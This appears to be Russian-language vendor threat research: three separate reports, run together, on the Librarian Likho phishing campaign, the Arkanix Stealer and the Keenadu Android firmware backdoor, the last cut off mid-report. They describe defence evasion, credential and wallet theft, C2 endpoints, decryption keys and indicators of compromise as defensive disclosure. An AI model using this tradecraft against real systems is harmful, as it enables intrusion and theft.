Жертва получает на почту фишинговое письмо с вредоносным исполняемым файлом в качестве вложения, который маскируется под предложение о сотрудничестве или заполненный бланк договора. Файлы имеют соответствующие названия, например: «Контракт на оказание услуг по Договору № 5445-95. Исх. № 125.com«. При этом злоумышленники никак не маскируют их расширения — атака, вероятно, рассчитана на невнимательного пользователя или жертву, которая не знакома с форматами файлов и может запустить вредоносное ПО, думая, что открывает текстовый документ. Вложение представляет собой инсталлятор, созданный при помощи Smart Install Maker. После запуска он выгружает в директорию Users\[REDACTED]\AppData\Local\Temp\$inst два архива формата .cab, замаскированные под временные файлы: 2.tmp и temp_0.tmp. После этого архивы по очереди распаковываются в одну и ту же директорию. В таблице ниже приводим полный список извлеченных из них файлов.

Чтобы отвлечь внимание жертвы, запускается файл-приманка с типовой структурой офисного документа.

Файл-приманка

Затем вредоносное вложение запускает файл find.cmd. Скрипт похож на тот, что использовался в предыдущей кампании, однако в нем появился парсинг C2-серверов: в ходе работы он создает виртуальное окружение, а также переменные под конкретные адреса, с которых скачиваются полезные нагрузки. Сами адреса скрипт получает из файла url.txt, который он парсит, по очереди подставляя данные в переменные.

Также в скрипте изменился путь, по которому он сохраняет скачанные с C2 исполняемые файлы. В новой версии это %APPDATA%\Windows. При этом на C2 инструменты, как и ранее, имеют расширение .jpg. После их инициализации новая версия find.cmd удаляет все файлы.
Пример части скрипта find.cmd, отвечающей за получение адресов из файла url.txt и загрузку полезной нагрузки:

Скрипт загружает с C2-сервера архивы bk.rar и pas.rar, а также кастомную версию архиватора WinRAR с названием файла driver.exe. Затем с помощью архиватора распаковывает скачанные файлы, используя вшитый пароль, и сохраняет их содержимое в директорию Users\[REDACTED]\AppData\Roaming\Windows.

Первым делом find.cmd запускает Trays.exe с опцией -tray для сокрытия окон приложений, которые будут выполнены далее. Также скрипт принимает меры по обходу средств защиты: останавливает сервисы, связанные с Microsoft Defender, и отключает профили файервола. После этого он устанавливает на устройство инструмент удаленного доступа AnyDesk, который затем запускает как системный сервис.

Пример части скрипта, отвечающей за отключение механизмов защиты и установку AnyDesk:

После того как скрипт find.cmd отработал, вложение запускает файл any.bat, также в формате скрипта, для создания точки закрепления через AnyDesk. Этот файл также устанавливает кастомный пароль для доступа к AnyDesk. Содержимое any.bat:

Последним вложение запускает скрипт bat.bat, часть которого приведена на скриншоте ниже.

Основная цель этого скрипта — предоставить оператору данные для подключения, а также подготовить узел к дальнейшей постэксплуатации:

• отключить режимы сна и гибернации (powercfg);
• собрать пароли из браузеров и почтовых клиентов;
• отправить при помощи blat.exe письма с:
  • паролями, восстановленными из браузеров (password.txt);
  • паролями, восстановленными из почтовых клиентов (email.txt);
  • конфигурационным файлом AnyDesk;
• отключить Microsoft Defender;
• рекурсивно удалить индикаторы компрометации;
• открыть на хосте порт 6004.

Жертвы

В рамках новой волны активности, которую мы приписываем Librarian Likho, атакам подвергся широкий круг российских организаций из различных отраслей экономики. В частности, зафиксированные инциденты затронули компании и учреждения из государственного сектора, а также организации, работающие в сфере строительства и промышленного производства.

Атрибуция

Мы с высокой степенью уверенности связываем данную волну атак с группой Librarian Likho, поскольку в ней присутствует множество технических и операционных признаков, характерных для предыдущих кампаний группы.

• Вектор первоначального доступа: жертвы получают письма с инсталлятором, замаскированным под офисные документы.
• Пути к файлам на C2 остались неизменными: /pas.jpg, /bk.jpg, /driver.jpg. При этом образец, как и раньше, обращается к архивам, замаскированным под графические файлы в формате .jpg.
• Основная вредоносная функциональность, как и в предыдущих кампаниях, разбита на три скрипта, которые запускаются последовательно. Хотя скрипты претерпели некоторые изменения, часть кода осталась идентичной прошлым версиям. К примеру, в файле bat.bat обход антивируса Microsoft Defender по-прежнему реализуется через команду start %APPDATA%\Windows\dc.exe /d.
• Некоторые инструменты полностью совпадают с теми, которые мы видели в предыдущих кампаниях, — вплоть до хэш-сумм. К примеру, файлы blat.exe и driver.exe идентичны соответствующим файлам из прошлых атак группы.

Совокупность этих факторов позволяет с высокой долей вероятности утверждать, что за данной активностью стоит группа Librarian Likho.

Выводы

APT-группа Librarian Likho продолжает атаковать российские компании. Ключевые характеристики атак не изменились, хотя злоумышленники частично переписали содержимое вредоносных скриптов. Прежними остались и цели кампании: получить удаленный доступ к зараженной машине через AnyDesk, передав конфигурацию по электронной почте, а также собрать пароли с узла. При этом, в отличие от прошлых атак, новая активность имеет массовый характер и не предполагает точечной рассылки.

Индикаторы компрометации

Хэши файлов

Вложенные инсталляторы
D74A9170F67EAE48C99BEDE82FED1B04
6CB133F0E75229970C58D86D9579DF39
B074647C2EAB8050E491E5CEC564C3DD
8169236D3BFDD302E0947FFABFC71352
EB88ABD21769AEB28314B04EC98EF891
504C35F6BD00BA4D6EC8FB6961B725BC
04F3301682935DCD2A6107691600D5DA
CE80219C049670773A34BE8D916F59D5
4145BFF00F573C22FBA487C286A1D82F
846BC86EDBD8FA6E04E688AEA44E8B8D
48F9987C390820BDD4C25DBFB357ADBF
F073CF8FEF35E202581FDA87C6FCE873
F9D3A8D16AE9DBBC5B12395FE0659109
B222B980B7B8A25F460DCDEA4C870883
06FDA5BCA9BA6FF5FEDA60FFC40E4AA1
A79609A872B255091ACFEA526E3443B3
7EA79B80AEEC5AF3320F9DC3C7FA1493
2E8664F97752B1D5CC5E36A20381509F
F089383975CE3DED25348AF1CBCDA100
F986D3D9CB571D3909820B9322BA76A8
92BD38808067213F5D868BAF54D84C53
6E2EEF6BE500CC15C48F10EDD6A1F03A
3099A7B16B4D94DCC4F8D84C0264DED9
96A40DBEEFE2719447383F08B5CB0998
1FBAF2E6883AB2B9B42D018F24081852
A06F3B619DF4398F468ED43CE3EEEC0C
7E6EF1C0FE694421B474DFF22E557756
89F3CE12B0FC5DB1D6817D1D232EC5BE
AD09793E9DA4CF9704C01B14DC330B7D
B60AC87654F9CC4D2C4E8E8C66D8670F
732756388900F68B2A93F07863B43BB6
828F475A83847ADF7AB0022A7F57FE8B
3603F5079333298FEEF45402D6B86FC9
81D5EB559A6E5305F4A0F7A4F47E72D0
9C8F63A49B66576B4BB94F536E3417AA
070A266E4C2D045044B48F1EC75BCB43
21A79E5E361CC0F2CDF6803747A85CB4
88D40484D1AB4D0677D37EC30BC2E907
71657F4F34FC1ACE9A42C35683FB8436
41463B1C01B1ECD6BB61C117236FD7A0

Blat Executable
79B11A56618CFB43953B29B71406C1EE

Имена легитимных файлов, использованных в атаке

4t Tray Minimizer Executable
Defender Control Executable
WebBrowserPassView Executable

Названия инсталляторов

Порядок представления информации организациями ОПК.com
Контракт на оказание услуг по Договору № 5445-95 Исх. № 125.com
Запрос Минпромторга о загрузке производства № 6415-74 Исх. 728.com
документы для проведения платежа № 4418 исх. n 845.com
платёжная документация № 4032 исх. n 706.com

C2-серверы

tofice[.]space
users-office[.]ru
woffice[.]top
mofice[.]store
emailon[.]ru
start-rambler[.]help

Пути к файлам на C2

/pas.jpg
/bk.jpg
/driver.jpg

Отправители

sanechekbogdanov@yandex[.]com
rabsbestrigmo63@yandex[.]ru
email@promkomitet[.]space

Введение

В октябре 2025 года мы обнаружили на форумах даркнета несколько сообщений с рекламой ранее неизвестного стилера, который его авторы называют Arkanix Stealer. Он распространялся по модели «вредоносное ПО как услуга» (MaaS), при этом клиенты получали не только сам имплант, но и доступ к панели управления с возможностью конфигурирования полезных нагрузок и просмотра статистики. Среди имплантов был замечен общедоступный инструмент постэксплуатации под названием ChromElevator. Для его доставки использовалась нативная версия стилера, написанная на C++ и обладающая широким набором возможностей — от сбора информации о системе до кражи данных криптовалютных кошельков. Помимо нее, мы обнаружили реализацию того же стилера на Python, поддерживающую динамическое изменение собственной конфигурации. Версия на Python часто распространялась в упакованном виде, что позволяло злоумышленникам распространять ее разными способами. Отдельно стоит отметить, что кампания Arkanix фактически представляла собой разовую операцию: на момент написания статьи партнерская программа, судя по всему, уже была свернута.

Решения «Лаборатории Касперского» детектируют эту угрозу как Trojan-PSW.Win64.Coins.*, HEUR:Trojan-PSW.Multi.Disco.gen и Trojan.Python.Agent.*.

Техническая информация

Предыстория

В октябре 2025 года на различных форумах даркнета были обнаружены посты с рекламой стилера, который автор назвал Arkanix Stealer. В них подробно описывались возможности зловреда и содержалась ссылка на Discord-сервер, который выступал в качестве основного канала общения между автором и потенциальными клиентами.

Пример рекламного поста стилера Arkanix

В ходе дальнейшего исследования открытых источников мы выявили набор имплантов, связанных с этим стилером.

Начальное заражение

Начальный вектор заражения достоверно неизвестен. Тем не менее названия некоторых файлов скриптов-загрузчиков, которые нам удалось получить, а именно steam_account_checker_pro_v1.py, discord_nitro_checker.py и TikTokAccountBotter.exe, позволяют с высокой степенью уверенности утверждать, что для первичного заражения использовался фишинг.

Python-загрузчик

Для загрузки и выполнения Python-версии стилера Arkanix применялся скрипт, написанный на Python. Мы обнаружили такие скрипты как в виде исходного кода, так и упакованные с помощью PyInstaller или Nuitka. У них общий вектор исполнения, и все они частично обфусцированы. Многие из них также служат приманкой и при беглом просмотре создают впечатление, что содержат легитимный код. Некоторые действительно обладают полезной функциональностью, тогда как другие лишь загружают стилер. Кроме того, встречались образцы без какой-либо обфускации, в которых стилер запускался в отдельном потоке с использованием встроенного в Python модуля threading.

Разновидности Python-загрузчиков для запуска следующего этапа

После выполнения загрузчик сначала устанавливает требуемые пакеты, в частности requests, pycryptodome и psutil, используя менеджер пакетов pip и модуля subprocess. В среде Microsoft Windows он также устанавливает pywin32. В некоторых проанализированных образцах эта процедура выполняется дважды. Загрузчик не валидирует вывод команды установки модулей и сразу отправляет POST‑запрос на hxxps://arkanix[.]pw/api/session/create, чтобы зарегистрировать только что скомпрометированную систему в панели управления, передавая заранее определенный набор параметров, — даже если установка завершилась неудачей. После этого стилер отправляет GET-запрос на hxxps://arkanix[.]pw/stealer.py и выполняет загруженную полезную нагрузку.

Python-версия стилера

В ходе исследования нам удалось получить образец стилера Arkanix, написанный на Python и загруженный с конечной точки hxxps://arkanix[.]pw/stealer.py загрузчиком предыдущего этапа.

Возможности стилера (или «функции» — в оригинале features, как их называет сам автор) в этой версии настраиваемые. Стандартная конфигурация уже прописана в самом файле скрипта. Для динамического обновления списка функций стилер отправляет GET‑запрос на hxxps://arkanix[.]pw/api/features/{payload_id}. Таким образом, возможности зловреда можно настраивать через панель управления. Список функций идентичен описанному в отчете GDATA.

Конфигурируемые параметры

Прежде чем приступить к выполнению функций, отвечающих за извлечение информации, стилер отправляет запрос на hxxps://arkanix[.]pw/upload_dropper.py, сохраняет полученный ответ в файл %TEMP%\upd_{случайное_8-байтовое_имя}.py и выполняет его. Нам не удалось получить содержимое этого скрипта, который сами злоумышленники называют дроппером.

В основной функции сбора данных по завершении каждого этапа обработки вся обнаруженная информация сериализуется в формат JSON и сохраняются по заранее заданному пути, например %LOCALAPPDATA\Arkanix_lol\%info_class%.json.

Ниже приведено подробное описание реализации функций сбора данных в Python-версии стилера.

Сбор информации о системе

Стилер Arkanix собирает различные данные о скомпрометированной системе. В частности, следующие:

• версия ОС;
• информация о центральном и графическом процессорах;
• объем оперативной памяти;
• разрешение экрана;
• раскладка клавиатуры;
• часовой пояс;
• установленное ПО;
• антивирусное ПО;
• наличие VPN-решений.

Для сбора информации используются стандартные консольные команды. Единственное исключение — данные о VPN-соединении. Чтобы их получить, стилер отправляет запрос на hxxps://ipapi[.]co/json/ и проверяет, относится ли соответствующий IP-адрес к набору известных VPN-сервисов, прокси-серверов или выходных узлов Tor.

Кража данных из браузеров

Стилер способен извлекать различные типы данных из браузеров. Всего он поддерживает 22 браузера — от широко распространенного Google Chrome до Tor Browser. Список браузеров, в отличие от других параметров, строго прописан в коде и не может быть изменен во время выполнения. У Arkanix есть отдельный модуль-граббер для браузера Chrome (о нем речь пойдет ниже), однако собирать информацию из браузеров может и сам стилер. В частности, он извлекает следующие данные:

• историю браузера (URL-адреса, количество посещений и время последнего посещения);
• данные автозаполнения (адреса электронной почты, номера телефонов, почтовые адреса и данные банковских карт);
• сохраненные пароли;
• файлы cookie;
• данные OAuth2 (из браузеров на базе Chromium).

Вся информация расшифровывается с использованием Windows DPAPI или AES (в зависимости от ситуации), после чего она просеивается на наличие релевантных ключевых слов. Среди браузерных данных стилер ищет исключительно ключевые слова, связанные с банковскими и платежными сервисами (например, revolut, stripe и bank) и криптовалютой (например, binance, metamask и wallet). Кроме того, стилер может извлекать данные из определенных криптовалютных браузерных расширений, список которых встроен в код.

Фрагмент списка расширений, из которых стилер извлекает данные

Сбор информации из Telegram

Сбор данных из Telegram начинается с принудительного завершения процесса Telegram.exe с помощью команды taskkill. Затем, если для параметра telegram_optimized установлено значение False, зловред упаковывает в ZIP-архив все содержимое каталога tdata, который обычно расположен по пути %APPDATA%\Roaming\Telegram Desktop\tdata, и передает его атакующему. В противном случае стилер избирательно копирует и упаковывает в ZIP-архив только те подкаталоги, которые содержат ценные данные, например историю сообщений. Полученный архив отправляется на конечную точку /delivery под именем tdata_session.zip.

Извлечение данных из Discord

Стилер имеет две функции, связанные с сервисом Discord: для кражи учетных данных и для автоматического распространения. Первая функция извлекает учетные данные как из стандартного, так и из сторонних клиентов. Если обнаружен клиент на базе Chromium, стилер запускает тот же механизм эксфильтрации данных, который применяется для кражи учетных данных из браузеров.

Функция автоматического распространения настраиваемая (ее можно отключить). Стилер получает через API Discord список друзей и каналов пользователя и рассылает сообщение, заданное злоумышленником. При этом стилер не позволяет прикреплять файлы к отправляемым сообщениям.

Сбор данных о VPN-сервисах

Функция сбора данных о VPN-сервисах проверяет наличие в системе известных VPN-решений, затем извлекает учетные данные из файлов, расположенных по заранее заданным путям, с помощью регулярных выражений. Поддерживаются следующие VPN-решения:

• Mullvad VPN
• NordVPN
• ExpressVPN
• ProtonVPN

Кража файлов

Стилер собирает определенные файлы независимо от заданной конфигурации. Скрипт проходит по заранее определенному списку путей, связанных с текущим пользователем (например, «Рабочий стол», «Загрузки» и т. п.), и ищет файлы документов и медиаданных по их расширениям. Кроме того, в скрипте предусмотрен фиксированный список имен файлов, подлежащих эксфильтрации. Извлеченные файлы упаковываются в ZIP-архив и позднее асинхронно передаются на командный сервер. Примечательно, что в списке имен файлов встречаются слова на французском языке, например motdepasse («пароль»), banque («банк»), seecret («секрет») и compte («учетная запись»).

Другие полезные нагрузки

Нам удалось определить дополнительные модули, загружаемые с командного сервера (то есть они не были встроены в скрипт стилера), однако не удалось их получить. Описание модулей приведено в таблице ниже. В столбце «Подробности» указана информация, которую мы вывели из основного кода стилера.

Скрипты патчера кошельков и сборщика дополнительных данных поступают с командного сервера в зашифрованном виде. Для их расшифровки используется алгоритм AES-GCM в сочетании с PBKDF2 (HMAC и SHA-256). Расшифрованная дополнительная полезная нагрузка представляет собой шаблон с подстановочными полями, которые заменяются соответствующими значениями, после чего файл сохраняется во временной папке под именем, часть которого генерируется случайным образом.

Код расшифровки данных и подстановки значений в шаблон

После завершения всех операций стилер удаляет себя с накопителя вместе с папкой артефактов (в рассматриваемом случае — Arkanix_lol).

Нативная версия стилера

В ходе анализа нам удалось добыть как релизную, так и отладочную версии нативной реализации стилера — обе они были загружены на общедоступные ресурсы. Ключевые различия между этими версиями приведены ниже.

• Релизная версия упакована с помощью VMProtect, однако виртуализация кода в ней не применяется.
• Отладочная версия обменивается данными с Discord-ботом, выступающим в роли командного сервера, тогда как релизная версия взаимодействует с ранее упомянутым доменом arkanix[.]pw.
• Отладочная версия ведет подробное логирование, по-видимому, для последующей отладки стилера.

Интересно, что в нативном варианте имя стилера явно указано в полях ресурса VersionInfo. Сведения об именовании совпадают между отладочной версией и некоторыми образцами релизной версии импланта.

Сведения о версии

После запуска стилер выполняет ряд контрмер, чтобы убедиться, что его процесс не запущен в песочнице или отладочной среде. После успешного прохождения этих проверок образец модифицирует функции AmsiScanBuffer и EtwEventWrite, чтобы предотвратить срабатывание любых нежелательных системных событий.

Обеспечив себе защиту от обнаружения, этот образец стилера приступает к сбору информации о системе. Список соответствующих функций зафиксирован в коде и, в отличие от Python-версии, не может быть изменен на стороне сервера. При этом список функций во многом повторяет возможности Python-версии, хотя и несколько шире. Рассмотрим уникальные функции нативной версии.

Сведения об RDP-соединениях

Стилер может собирать данные об известных RDP-соединениях, устанавливаемых скомпрометированным пользователем. Он ищет файлы .rdp в папке %USERPROFILE%\Documents и извлекает из них полный адрес сервера, имя пользователя, пароль и порт.

Файлы игровых клиентов

Стилер нацелен на геймеров и может извлекать учетные данные из клиентов популярных игровых платформ, включая:

• Steam
• Epic Games Launcher
• net
• Riot
• Origin
• Unreal Engine
• Ubisoft Connect
• GOG

Создание скриншотов

Нативная версия, в отличие от разновидности на Python, способна делать скриншоты каждого монитора с помощью WinAPI-функции capCreateCaptureWindowA.

Напоследок отметим, что этот образец обменивается данными с командным сервером через те же конечные точки, что и Python-версия. Однако в этом случае вообще все данные шифруются по той же схеме AES-GCM + PBKDF2 (HMAC и SHA-256), частично реализованной в варианте на Python. В некоторых проанализированных образцах использовался ключ arkanix_secret_key_v20_2024. Примечательно также, что образец, написанный на C++, явно указывает значение ArkanixStealer/1.0 в качестве User-Agent.

Инструмент для извлечения браузерных данных на этапе после компрометации

Этот имплант встроен в раздел ресурсов версии, написанной на C++, без какого-либо шифрования или обфускации. Стилер извлекает полезную нагрузку во временную папку под случайно сгенерированным именем, состоящим из шестнадцатеричных символов (0–9 и A–F), а затем запускает ее с помощью WinAPI-функции CreateProcess. Полезная нагрузка представляет собой общедоступный проект ChromElevator без каких-либо модификаций. Если вкратце, этот инструмент состоит из двух компонентов: инъектора и основной полезной нагрузки. Инъектор инициализирует механизм прямого вызова системных функций, создает экземпляр процесса целевого браузера в приостановленном режиме и внедряет в него расшифрованный код посредством системных вызовов Nt. Внедренная полезная нагрузка затем расшифровывает мастер-ключ браузера и эксфильтрует различные данные, включая cookie-файлы, сохраненные учетные данные и веб-данные.

Инфраструктура

Нам удалось выявить два домена, использованных злоумышленниками в ходе кампании Arkanix. Хотя трафик с этих доменов проходил через Cloudflare, нам удалось определить реальный IP-адрес одного из них — arkanix[.]pw. Для второго домена удалось установить только IP-адрес Cloudflare.

На обоих серверах также размещалась панель управления стилером, через которую злоумышленники могли отслеживать своих жертв. Содержимое панели было скрыто за страницей входа. Ближе к концу нашего исследования панель перестала работать без каких-либо пояснений или уведомлений.

Страница входа в панель управления стилером

Реклама стилера

В ходе исследования кампании мы обратили внимание на ссылку в форумных постах с рекламой стилера, ведущую на Discord-сервер под названием Arkanix. Этот сервер выступал в роли форума, где авторы стилера публиковали различный контент, а пользователи могли задавать вопросы о работе зловреда. В основном пользователи выражали авторам благодарность и интересовались, когда та или иная обещанная функция будет добавлена в стилер. Авторы же публиковали более разнообразный контент. Они налаживали коммуникацию с потенциальными покупателями, используя те же маркетинговые приемы, что и легальные компании. Например, они подогревали интерес аудитории, предлагая участвовать в опросах о функциях, которые стоит или не стоит добавлять, таких как внедрение в Discord-клиент и склейка с легитимным приложением (биндинг).

Голосования по функциям

Также ближе к концу октября автор пообещал выпустить дополнительный проект — криптор — примерно через месяц-полтора. По состоянию на данный момент стилер, похоже, выведен из эксплуатации без какого-либо предупреждения, а криптор так и не был выпущен.

Криптор Arkanix

В качестве дополнительной меры продвижения авторы стилера Arkanix решили внедрить реферальную программу для привлечения новых клиентов. По их обещаниям, рефереры получали бы дополнительный час использования премиум-лицензии для работы с панелью, а привлеченные рефералы получали бы семь дней бесплатного пробного использования премиум-плана. Согласно форумным постам, премиум-предложение включало следующие возможности:

• нативный стилер на C++;
• внедрение в криптовалютные кошельки Exodus и Atomic;
• увеличение лимита на генерацию полезных нагрузок (до десяти);
• приоритетная поддержка.

Реферальная программа и соответствующие элементы интерфейса в панели управления

Скриншот проекта стилера в Visual Studio, опубликованный на Discord-сервере, позволил нам сделать некоторые технические выводы. Начнем с того, что автор проекта, судя по всему, говорит на немецком языке.

Реферальная программа и соответствующие элементы интерфейса в панели управления

На том же скриншоте видны общеизвестные признаки использования ИИ-ассистента при разработке, такие как наличие файла utils.cpp в проекте. Эту гипотезу также подтверждают общая структура кода, наличие комментариев и подробное логирование отладочных данных.

Примеры кода с признаками генерации с помощью LLM

Выводы

Стилеры всегда представляли серьезную угрозу для конфиденциальности пользовательской информации. Arkanix не является исключением — этот стилер нацелен на широкий круг пользователей, от геймеров и поклонников криптовалют до клиентов онлайн-банкинга. Он собирает обширный набор сведений, включая специфические персональные данные. Несмотря на широкую функциональность, в его коде заметны признаки генерации с помощью LLM, что, по всей видимости, позволило значительно сократить время и затраты на разработку. Это также говорит в пользу того, что Arkanix скорее представляет собой одноразовую кампанию для быстрого получения финансовой выгоды, чем долгосрочную угрозу. Панель управления и чат в Discord прекратили работу в декабре 2025 года без каких-либо пояснений или намеков на дальнейшую разработку и возрождение проекта.

Отдельно отметим, что авторы Arkanix стремились быть ближе к своим клиентам: они создали форум, где публиковали подробности о ходе разработки, проводили опросы и даже внедрили реферальную программу, обещая бонусы тем, кто «приведет друга». Такой подход делает Arkanix ближе по духу к разработчикам общедоступного ПО, а не сомнительных стилеров из даркнета.

Индикаторы компрометации

Хэш-суммы файлов
Дополнительные индикаторы компрометации доступны клиентам сервиса Threat Intelligence. Для получения более подробной информации свяжитесь с нами по адресу [email protected].

752e3eb5a9c295ee285205fb39b67fc4
c1e4be64f80bc019651f84ef852dfa6c
a8eeda4ae7db3357ed2ee0d94b963eff
c0c04df98b7d1ca9e8c08dd1ffbdd16b
88487ab7a666081721e1dd1999fb9fb2
d42ba771541893eb047a0e835bd4f84e
5f71b83ca752cb128b67dbb1832205a4
208fa7e01f72a50334f3d7607f6b82bf
e27edcdeb44522a9036f5e4cd23f1f0c
ea50282fa1269836a7e87eddb10f95f7
643696a052ea1963e24cfb0531169477
f5765930205719c2ac9d2e26c3b03d8d
576de7a075637122f47d02d4288e3dd6
7888eb4f51413d9382e2b992b667d9f5
3283f8c54a3ddf0bc0d4111cc1f950c0

Домены и IP-адреса
arkanix[.]pw
arkanix[.]ru

В апреле 2025 года мы рассказывали про новую на тот момент версию бэкдора Triada, заразившую прошивки поддельных Android-устройств, которые распространялись через популярные маркетплейсы. Зловред располагался в системных разделах прошивок и проникал в Zygote — родительский процесс для всех приложений в системе — что приводило к заражению любого приложения на устройстве. Благодаря этому троянец мог, например, похищать учетные данные от мессенджеров и социальных сетей.

Находка побудила нас провести исследование и поискать другие угрозы, содержащиеся в прошивках Android-устройств. Так мы обнаружили новый бэкдор — Keenadu — который, как и Triada, встраивался в прошивки и заражал каждое приложение, запущенное на устройстве. Бэкдор оказался весьма распространенным — после его обнаружения наши пользователи стали массово обращаться в службу поддержки за дополнительной информацией об этой угрозе. Цель данного отчета — ответить на большинство вопросов и рассказать о новой угрозе.

Наши выводы в двух словах.

• Мы обнаружили новый бэкдор, который назвали Keenadu, в прошивках устройств нескольких брендов. Он попадал туда на этапе сборки — вредоносная статическая библиотека линковалась с libandroid_runtime.so. Уже на устройстве она, как и Triada, заражала процесс Zygote. В некоторых случаях вредоносная прошивка загружалась с OTA-обновлением.
• Копия бэкдора попадает в адресное пространство каждого приложения при его запуске на устройстве. Зловред представляет собой многоуровневый загрузчик, который предоставляет операторам неограниченные возможности для контроля устройства жертвы.
• Нам удалось получить полезные нагрузки, которые скачивает Keenadu. В зависимости от зараженного приложения, они подменяют поисковые запросы в браузере, монетизируют установки новых программ, а также скрытно взаимодействуют с рекламными элементами.
• Одна из полезных нагрузок, полученная в ходе исследования, также обнаружилась в множестве приложений, которые распространялись как через неофициальные источники, так и через Google Play и Xiaomi GetApps.
• В прошивках некоторых устройств Keenadu был встроен в важные системные приложения: сервис для распознавания лиц, приложение для рабочего стола и т. д.
• В ходе исследования нам удалось установить связь крупнейших Android-ботнетов: Triada, BADBOX, Vo1d и Keenadu.

Полная цепочка заражения выглядит следующим образом.

Полная схема заражения

Решения «Лаборатории Касперского» детектируют описанные ниже угрозы со следующими вердиктами:

HEUR:Backdoor.AndroidOS.Keenadu.*
HEUR:Trojan-Downloader.AndroidOS.Keenadu.*
HEUR:Trojan-Clicker.AndroidOS.Keenadu.*
HEUR:Trojan-Spy.AndroidOS.Keenadu.*
HEUR:Trojan.AndroidOS.Keenadu.*
HEUR:Trojan-Dropper.AndroidOS.Gegu.*

Вредоносный дроппер в libandroid_runtime.so

В самом начале исследования наше внимание привлекли подозрительные библиотеки, расположенные по путям /system/lib/libandroid_runtime.so и /system/lib64/libandroid_runtime.so (в дальнейшем для краткости будем использовать представление /system/lib[64]/ для обозначения этих двух директорий). Такая библиотека есть в оригинальном Android. В частности, в ней определен нативный метод println_native для класса android.util.Log. Приложения используют его для записи в журнал логов logcat. В подозрительных библиотеках реализация этого метода отличалась от легитимной вызовом одной функции.

Вызов подозрительной функции

Подозрительная функция расшифровывала данные из тела библиотеки c использованием RC4 и записывала их по пути /data/dalvik-cache/arm[64]/system@framework@[email protected]. Эти данные представляют собой полезную нагрузку, которая подгружается с помощью DexClassLoader. Точкой входа в ней является метод main класса com.ak.test.Main, где ak, вероятно, отсылает к авторскому названию зловреда: это буквосочетание используется и в других местах в коде. В частности, разработчики оставили много кода, который пишет сообщения об ошибках в ходе работы зловреда в журнал logcat. Для этих сообщений используется тег AK_CPP.

Расшифрование полезной нагрузки

Полезная нагрузка проверяет, не запущена ли она в системных приложениях из числа сервисов Google, а также в системных приложениях операторов Sprint и T-Mobile. Последние, как правило, встречаются в специальных версиях устройств, которые операторы продают по заниженной цене с условием, что покупатель заключит с ними договор на предоставление услуг связи. Если зловред запущен в таких процессах, то он завершает свою работу. Также в нем реализован механизм завершения работы, если в системных директориях присутствуют файлы с определенными именами.

Далее троянец проверяет, запущен ли он в процессе system_server. Этот процесс управляет всей системой и имеет максимальные привилегии. Его запускает процесс Zygote в начале своей работы. Если результат проверки положительный, троянец создает экземпляр класса AKServer, если же код работает в любом другом процессе — создается экземпляр класса AKClient. У созданного объекта вызывается метод, которому передается имя процесса приложения. Названия классов намекают на то, что в основе троянца лежит клиент-серверная архитектура.

Запуск system_server в Zygote

Процесс system_server создает и запускает различные системные сервисы с помощью класса SystemServiceManager. В основе этих сервисов лежит архитектура «клиент-сервер», а клиенты для них запрашиваются в коде приложений с помощью вызова метода Context.getSystemService. Общение с серверной частью осуществляется с помощью примитива межпроцессной коммуникации в Android — binder. У такого подхода есть множество преимуществ, в том числе с точки зрения безопасности. К ним относится, например, возможность ограничивать некоторым приложениям доступ к различным системным сервисам и их функциональности, а также наличие абстракций, позволяющих упростить использование этого доступа для разработчиков и одновременно защитить систему от возможных уязвимостей в приложениях.

Авторы Keenadu спроектировали его похожим образом. Основная логика расположена в классе AKServer, который работает в процессе system_server. AKServer фактически представляет собой вредоносный системный сервис, а AKClient — интерфейс для обращения к AKServer с помощью binder. Для удобства мы приводим схему устройства бэкдора ниже.

Схема работы бэкдора Keenadu

Тут стоит отметить, что Keenadu в очередной раз компрометирует ключевые принципы безопасности Android. Во-первых, поскольку он встроен в libandroid_runtime.so, он работает в контексте каждого приложения на устройстве, получая таким образом доступ ко всем их данным и делая бессмысленной изоляцию приложений друг от друга, которая предусмотрена системой. Во-вторых, он предоставляет интерфейсы для обхода разрешений (о них мы расскажем ниже), при помощи которых регулируются права приложений в системе. Таким образом, Keenadu представляет собой полноценный бэкдор, позволяющий атакующим получить практически неограниченный контроль над устройством жертвы.

Как устроен AKClient

AKClient устроен достаточно просто. Он встраивается во все запускаемые на устройстве приложения и получает экземпляр интерфейса для общения с сервером с помощью защищенного широковещательного сообщения (protected broadcast) com.action.SystemOptimizeService. Этот интерфейс через механизм binder посылает вредоносному AKServer запрос с именем attach, передавая в нем IPC-обертку над функциональностью для загрузки произвольных DEX-файлов в контексте зараженного приложения. Это позволяет AKServer реализовать логику для запуска вредоносных полезных нагрузок в зависимости от приложения.

Как устроен AKServer

AKServer в начале своей работы рассылает два защищенных широковещательных сообщения (protected broadcast): com.action.SystemOptimizeService и com.action.SystemProtectService. Первое сообщение, как мы уже описывали, передает другим процессам, зараженным AKClient, экземпляр интерфейса для взаимодействия с AKServer. Вместе с сообщением com.action.SystemProtectService также передается экземпляр другого интерфейса для взаимодействия с AKServer. С помощью этого интерфейса вредоносные модули, скачиваемые в контекстах других приложений, могут:

• выдавать любые разрешения произвольному приложению на устройстве;
• отзывать любые разрешения у произвольного приложения на устройстве;
• получать геолокацию устройства;
• получать информацию об устройстве.

Вредоносный интерфейс для управления разрешениями и получения данных об устройстве

После того как взаимодействие серверной и клиентской части настроено, AKServer запускает основную вредоносную задачу под названием MainWorker. MainWorker при первом запуске сохраняет текущее время. После этого зловред проверяет язык устройства и его часовой пояс. Если язык интерфейса является одним из диалектов китайского, а само устройство расположено в одном из китайских часовых поясов, то он прекращает работу. Также он не отработает, если на устройстве отсутствует магазин приложений или сервисы Google Play. Если же оно прошло проверки, троянец запустит задачу PluginTask. PluginTask в начале своей работы расшифровывает адреса командных серверов из кода следующим образом.

1. Строка с зашифрованным адресом декодируется с помощью Base64.
2. Полученные данные — сжатый с помощью gzip буфер — распаковываются.
3. Распакованные данные расшифровываются с помощью AES-128 в режиме CFB. Ключ для расшифрования — MD5 от строки ota.host.ba60d29da7fd4794b5c5f732916f7d5c, IV — строка 0102030405060708.

Расшифровав адреса командных серверов, троянец собирает данные об устройстве жертвы: модель, IMEI, MAC-адрес, версию ОС и т. д. и шифрует их таким же образом, как и адреса серверов, только в качестве AES-ключа используется MD5 от строки ota.api.bbf6e0a947a5f41d7f5226affcfd858c. Зашифрованные данные отправляются на командный сервер POST-запросом по пути /ak/api/pts/v4. В параметры запроса передается два значения:

• m — MD5 от IMEI устройства;
• n — тип подключения к сети (w — Wi-Fi, m — мобильный интернет).

